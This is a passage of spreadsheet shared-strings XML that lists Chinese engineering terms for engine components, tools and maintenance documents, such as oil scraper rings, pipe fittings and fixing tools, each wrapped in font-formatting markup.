      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具套件图片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒扳手成套箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具套装</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具自锁垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作定位绳索</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作台顶板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作台架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>公差数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率估算</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率减小图表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功率输出装置的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>功能图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>攻螺纹调整片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨管路</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供气单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供应商目录</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钩扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钩扳手用螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钩环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钩形扳手用圆螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钩形板手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>构造布局</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>购买的特殊部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴，叶轮，外部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毂盘润滑油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>骨架密封圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定叉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定工具，曲柄销轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定工具，伸缩管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定夹板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定夹具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定块，铝</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定铣削托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>故障检修指导</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>故障排除</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>故障说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮环安装用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮环基环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮环装配块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮削板固定块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环壳体，上部</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环壳体上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环壳体下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环壳体总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环腔</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环外壳，整体</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拐档差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>关闭阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>观察镜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>观察镜罩壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>软管到泵组</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回气室</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变速箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管布置原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管叉板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管夹托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管卡</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路托架支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管系表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
